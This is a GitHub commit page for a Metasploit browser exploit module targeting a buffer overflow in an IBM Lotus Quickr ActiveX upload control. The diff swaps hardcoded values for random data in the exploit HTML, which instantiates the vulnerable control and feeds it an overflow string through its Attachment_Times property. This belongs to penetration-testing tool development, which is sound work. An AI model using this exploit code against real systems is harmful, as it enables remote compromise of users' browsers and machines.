Skip to content

Commit 9ffb0dc

Browse files
author
jvazquez-r7
committed
switch to some random data
1 parent 8ea5c99 commit 9ffb0dc

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

modules/exploits/windows/browser/quickr_qp2_bof.rb

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -231,11 +231,11 @@ def load_exploit_html(my_target, cli)
231231
<body>
232232
<object id="UploadControl" width="100%" height="100%" classid="clsid:05D96F71-87C6-11D3-9BE4-00902742D6E0">
233233
<param name="General_Mode" value="1">
234-
<param name="General_URL" value="http://localhost/iNotes/Forms85.nsf/0/">
234+
<param name="General_URL" value="http://#{rand_text_alpha(rand(10) + 5)}">
235235
</object>
236236
<script>
237237
var bof = unescape("#{my_bof}");
238-
var my_time = "7/20/2011 11:01:42 ";
238+
var my_time = "#{rand_text_numeric(2)}/#{rand_text_numeric(2)}/#{rand_text_numeric(4)} #{rand_text_numeric(2)}:#{rand_text_numeric(2)}:#{rand_text_numeric(2)} ";
239239
my_time += bof;
240240
my_time += " GMT";
241241
UploadControl.Attachment_Times = my_time;

0 commit comments

Comments
 (0)